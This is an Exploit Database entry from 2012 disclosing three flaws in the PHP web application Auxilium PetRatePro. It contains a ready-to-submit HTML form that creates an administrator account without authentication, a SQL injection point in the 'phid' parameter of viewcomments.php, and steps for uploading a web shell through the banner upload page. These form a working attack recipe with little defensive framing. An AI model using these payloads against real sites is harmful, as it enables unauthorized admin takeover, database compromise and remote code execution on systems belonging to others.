Auxilium PetRatePro – Multiple Vulnerabilities

• Exploit Database
• 11 阅读

• 作者： DaOne
  日期： 2012-09-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/21329/

• ##########################################
  [~] Exploit Title: Auxilium PetRatePro Multiple Vulnerabilities
  [~] Date: 14/09/2012
  [~] Author: DaOne (@LibyanCA)
  [~] Software Link: http://www.auxiliumsoftware.com
  [~] Google Dork: "N/A"
  ##########################################
  
  [#] 1-[Remote Add Admin]:
  
  <form name="myform" method="post" action="http://localhost/PetRatePro/admin/createnewadmin.php" onsubmit="javascript: return checkifvalid();">
  (Create New Administrator)
  Username
  <input name="username" type="text" id="name" size="20">
  Password<input name="upassword" type="text" id="upassword" size="20">
  Name<input name="name1" type="text" id="name1" size="20">
  Email Address <input name="email" type="text" id="email" size="20">
  <input type="submit" value="Create " name="B1">
  </form>
  
  
  
  [#] 2-[SQL Injection]
  
  viewcomments.php parameter phid
  
  http://localhost/PetRatePro/viewcomments.php?phid=[SQLi]
  
  
  
  [#] 3-[Remote File Upload]
  
  Go to: http://localhost/PetRatePro/admin/sitebanners/upload_banners.php
  and upload your Shell...
  will find files here ... /PetRatePro/banners/shell.php
  
  
  ##########################################
  [*] Contact me
  www.facebook.com/DaOne.Ly
  ##########################################